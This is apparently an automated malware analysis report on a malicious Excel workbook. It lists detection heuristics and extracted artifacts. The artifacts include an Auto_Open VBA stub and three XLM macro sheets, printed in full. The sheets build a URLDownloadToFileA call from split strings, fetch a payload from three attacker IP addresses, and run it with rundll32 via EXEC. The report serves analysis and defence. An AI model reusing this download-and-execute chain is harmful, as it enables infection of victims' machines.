Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d263bf281109edc7…

MALICIOUS

Office (OOXML)

114.2 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-15
MD5: dd2f00d3e39352ccdd2b3ef8b00846a0 SHA-1: dd1a9ec8abd1697db8d33a9e58b74fd2e0491bb7 SHA-256: d263bf281109edc7bdea47ddfe281b9a2c8b4e265de8aa9dcefffc30fc58602a
158 Risk Score

Heuristics 6

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: FORMULA, HALT, GOTO, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub Auto_Open()
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://91.211.91.81/44313,6048108796.dat Referenced by macro
    • http://5.34.179.36/44313,6048108796.datReferenced by macro
    • http://45.153.229.23/44313,6048108796.datReferenced by macro
    • http://91.211.91.81/Referenced by macro
    • http://5.34.179.36/Referenced by macro
    • http://45.153.229.23/Referenced by macro
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2437 bytes
SHA-256: aa10abebc3ece39bf198cf3383ccb30417606e0a98d60e87747026c15426213c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Byutut"

Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub

Attribute VB_Name = "Vrest"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 23552 bytes
SHA-256: c273c0ba9b123bfd6c5297a7692bdade93c1afc5139260c65963114883a46fd3
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 4505 bytes
SHA-256: 665f6c9f9b4a972fb7c9cd862f5d81f8391866e0188d24c7f028f17a82f6de37
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E3EE2C8-4BD1-4A7A-8165-1C49BDB78CBA}"><dimension ref="AE74:AK92"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="29" width="13.5703125" style="4"/><col min="30" max="30" width="13.5703125" style="4" customWidth="1"/><col min="31" max="33" width="13.5703125" style="4" hidden="1" customWidth="1"/><col min="34" max="34" width="17.42578125" style="4" hidden="1" customWidth="1"/><col min="35" max="35" width="13.5703125" style="4" hidden="1" customWidth="1"/><col min="36" max="36" width="21.5703125" style="4" hidden="1" customWidth="1"/><col min="37" max="37" width="13.5703125" style="2" hidden="1" customWidth="1"/><col min="38" max="38" width="13.5703125" style="4"/><col min="39" max="39" width="21.42578125" style="4" bestFit="1" customWidth="1"/><col min="40" max="16384" width="13.5703125" style="4"/></cols><sheetData><row r="74" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG74" s="4" t="str"><f>CONCATENATE(AF80,AG80,AH78,AG78,AG79)</f><v>http://91.211.91.81/44313,6048108796.dat</v></c></row><row r="75" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG75" s="4" t="str"><f>CONCATENATE(AF80,AG81,AH78,AG78,AG79)</f><v>http://5.34.179.36/44313,6048108796.dat</v></c><c r="AI75" s="4"><v>1</v></c></row><row r="76" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG76" s="4" t="str"><f>CONCATENATE(AF80,AG82,AH78,AG78,AG79)</f><v>http://45.153.229.23/44313,6048108796.dat</v></c><c r="AI76" s="4"><v>9</v></c></row><row r="77" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AJ77" s="4" t="b"><f>ON.TIME(NOW()+"00:00:02","Grestes")</f><v>0</v></c></row><row r="78" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG78" s="4" t="s"><v>0</v></c><c r="AH78" s="4"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="79" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG79" s="4" t="s"><v>1</v></c><c r="AH79" s="4" t="b"><f>FORMULA(AG85&amp;AG86&amp;AG92,AI83)</f><v>0</v></c></row><row r="80" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AF80" s="4" t="str"><f>"http://"</f><v>http://</v></c><c r="AG80" s="4" t="str"><f>"91.211.91.81/"</f><v>91.211.91.81/</v></c><c r="AJ80" s="4" t="b"><f>HALT()</f><v>0</v></c></row><row r="81" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG81" s="4" t="str"><f>"5.34.179.36/"</f><v>5.34.179.36/</v></c></row><row r="82" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG82" s="4" t="str"><f>"45.153.229.23/"</f><v>45.153.229.23/</v></c><c r="AI82" s="4" t="s"><v>2</v></c></row><row r="84" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AI84" s="4" t="s"><v>3</v></c></row><row r="85" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG85" s="4" t="str"><f>"URLDo"</f><v>URLDo</v></c><c r="AI85" s="4" t="s"><v>4</v></c></row><row r="86" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG86" s="4" t="str"><f>"wnloadT"</f><v>wnloadT</v></c></row><row r="87" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AH87" s="4" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c></row><row r="88" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AI88" s="4" t="s"><v>5</v></c></row><row r="92" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG92" s="4" t="str"><f>"oFileA"</f><v>oFileA</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 2129 bytes
SHA-256: c842664d4adfbab64cc38d3d12f48bc3fe942196965e9c614671ea94f3e6afd5
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{B06B5105-687C-43F7-A487-3A7680CBC977}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="3"/><col min="7" max="7" width="12.140625" style="3" customWidth="1"/><col min="8" max="16384" width="9.140625" style="3"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="3" t="b"><f>REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="3" t="e"><f>Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="3" t="e"><f>IF(G12&lt;0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="3" t="e"><f>IF(G13&lt;0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="3"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="3" t="e"><f>GOTO(Jioka!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet3.xml 1949 bytes
SHA-256: 10c797d7a3c632796484bdf562cdd2d33c46d8d630def0609945fce50d2eff68
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7CC12E8C-181F-40F2-A690-14110549575E}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="3"/><col min="8" max="8" width="9.85546875" style="3" customWidth="1"/><col min="9" max="16384" width="9.140625" style="3"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="3" t="str"><f>"rund"</f><v>rund</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="3" t="str"><f>"ll32 ..\Ladfge.VDGfwr,DllReg"</f><v>ll32 ..\Ladfge.VDGfwr,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="3" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="3" t="b"><f>PI()=EXEC(I7&amp;I9&amp;I10)=PI()</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="3" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.